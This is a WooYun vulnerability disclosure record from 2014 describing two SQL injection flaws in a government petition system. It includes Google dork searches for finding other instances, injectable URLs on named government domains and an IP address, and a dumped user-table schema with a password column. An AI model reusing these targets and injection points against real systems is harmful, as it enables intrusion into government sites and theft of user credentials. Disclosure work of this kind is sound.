漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-074311
漏洞标题:某政府信访系统存在两处SQL注入漏洞
相关厂商:杭州中软安人网络通信有限公司
漏洞作者: wefgod
提交时间:2014-08-29 11:16
修复时间:2014-11-27 11:18
公开时间:2014-11-27 11:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经确认,细节仅向厂商公开
2014-09-06: 细节向第三方安全合作伙伴开放
2014-10-28: 细节向核心白帽子及相关领域专家公开
2014-11-07: 细节向普通白帽子公开
2014-11-17: 细节向实习白帽子公开
2014-11-27: 细节向公众公开
简要描述:
无技术含量各位低调不用在意
详细说明:
注:第一处重复
搜索
http://music.google.cn/search?q=inurl:policylaw/policylaw.do&newwindow=1&filter=0
http://music.google.cn/search?q=inurl:index/index.do%3Fact%3Dindex&newwindow=1&filter=0
之前有人提交文件下载
WooYun: 某政府通用系统任意文件下载漏洞
杭州中软安人网络通信有限公司设计维护
漏洞证明:
SQL1
http://www.hzxf12345.gov.cn/appellate/appellate.do?act=read&jlbh=%A8%AA?0113201405300015
Table: WEB_USERINFO
[11 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ID | NUMBER |
| MAXQUANTUM | NUMBER |
| MEMO | VARCHAR2 |
| QUANTUM | NUMBER |
| ROLE | VARCHAR2 |
| TELEPHONE | VARCHAR2 |
| UNIT_ID | NUMBER |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
| USERPSW | VARCHAR2 |
| USERTYPE | CHAR |
+------------+----------+
http://qzxx.kq.gov.cn/sxwsxf/appellate/appellate.do?act=read&jlbh=%A8%AA?0113201405300015
http://122.224.136.141:3465/scwsxf/appellate/appellate.do?act=read&jlbh=%CD%F8A0010201404140001'
SQL2
http://www.hzxf12345.gov.cn/work/rmjyzj.do?act=qtlist&flag=1
修复方案:
过滤了
版权声明:转载请注明来源 wefgod@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-09-03 09:46
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调案例用户单位,同时CNVD将尝试联系软件生产厂商——杭州中软人安(无联系电话),后续直接通过公开邮件通报。
最新状态:
暂无